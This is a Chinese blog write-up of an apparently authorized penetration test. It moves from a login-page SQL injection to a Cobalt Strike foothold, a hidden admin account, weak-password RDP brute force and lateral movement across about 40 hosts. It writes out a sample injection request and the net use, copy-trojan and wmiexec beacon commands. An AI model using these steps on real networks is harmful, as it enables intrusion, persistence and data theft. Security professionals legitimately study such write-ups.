安服仔某渗透项目实战

华盟君华盟君 渗透测试 2月前
6.62K 0
华盟原创文章投稿奖励计划 
作者:小黑原文:https://zone.huoxian.cn/d/912

前言

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞挖掘

由于是做项目客户大大会直接将测试系统甩过来,所以这里就不过多介绍信息收集了,直接开始日

我的方法的话通过AWVS+人工渗透来进行测试

通过1-2小时的扫描发现Sql注入漏洞,此时我们来进行人工复现,首先呢先访问漏洞url,然后通过bp抓包,抓包如下: 

poc:POST /xxx/xxxx/login.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://xxx.xxx.com:7699/Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 58User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: xx.xx.xx.xxConnection: Keep-alivepwd=&userno=59s45qhepwd=&userno=59s45qhe

可以得知这个数据包呢是一处登录口的数据包但是访问的话不能正常访问,但是AWVS爆漏洞我们还是老老实实将数据包保存跑一下Sqlmap,Sqlmap测试结果如下:自动草稿图 1-1 Sql注入DBA

测试结果对方未mssql数据库+Windows操作系统+asp.net站点,且为DBA权限,主要为DBA权限的话我们的操作空间就会很大了,接下来讲解内网渗透

二、内网渗透

通过图 1-1得知对方未DBA权限这里直接获取对方的os-shell以此来执行powershell命令以此上线cs

自动草稿
图 2-1 Sql注入命令执行

执行之后成果上线,由于通过信息收集发现对方只打了5个补丁,且杀毒检测也是关闭的,这里的话我就直接进行了提权

图片
图 2-2 上线CS

提权完之后我们在进行信息收集以及密码抓取,由于探测对方为win2016 系统因此抓不到明文密码因此我这里添加影子用户admin$/admin@123../,做内网socks代理进行远程连接,这里做端口转发的话容易被发现所以我是直接通过对方的网络进行连接,也有一定的隐蔽性

自动草稿
图 2-3 172.16.0.188服务器

接着利用此用户做了简简单单权限维持后,将内网神器fscan上传至服务器隐藏文件夹进行扫描,成功通过弱口令拿下大量机器,由于机器太多我这里就直接贴cs上线的截图以及部分机器截图了

通过内网扫描工具爆破rdp获取的机器如下:

弱口令都为:administrator/123456

自动草稿
图 2-4 172.16.0.175服务器

自动草稿
图 2-5 172.16.4.19个人PC

自动草稿
图 2-6 172.16.7.39个人PC

这里由于机器过多所以这里就只贴三张图了,rdp弱口令拿下将近12台主机

接下来就是通过内网的ipc共享加wmi以及加壳免杀上线CS,如下:

这里不直接用ipc横向的原因就是在创计划任务时提示拒绝访问,自我猜测被360天擎拦截,然后将ipc和wmi组合用的原因呢就是wmi需要将后门上传web服务器,但是这样很容易被发现,ipc传马的话只需建立连接直接传马加上wmi直接进行执行在connect连接即可

这里利用的前提条件的话需要指导对方的一个账号密码且对方要开启共享以及135端口,这里通过爆破的话也是获取到了大量机器的账号密码都为:administrator/123456

接着将其上线如下:

自动草稿

自动草稿
图 2-7-8 主机上线图

自动草稿
图 2-9 横向移动

ipc:

net use \ip\ipc$ 密码 /user:用户名 \进行ipc连接

copy 某盘符木马 \ip\c$ \将拿到的服务器的木马传至对方的c盘

wmi:wmiexec ./administrator:admin!@#45@ip "cmd.exe /c c:/beacon.exe" \执行传在c盘木马

机器权限拿的差不多了在贴一张FTP吧

FTP:弱口令:admin/admin

文件预估有一万以上,预计是FTP服务器来的存储了大量文件

自动草稿
图 2-10 FTP

至此渗透结束、总结拿到的机器权限40多台、FTP权限上百个。由于授权测试时间只给了两天,不然足够有时间拿到域控以及进入工控网等

结束语

其实每次渗透测试实战时每个环境都不一样,这里给各位师傅一句建议就是每次做渗透时要么写一份语雀要么将报告保存好,这样有助于增长我们的实战经验忘了也可以返回去看自己的骚姿势。在此感谢各位师傅观看!Thank you!


黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

本文来源https://zone.huoxian.cn/d/912,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。
华盟君官方
华盟君

4.67K篇文章 130.19M总阅读量

相关文章

发表评论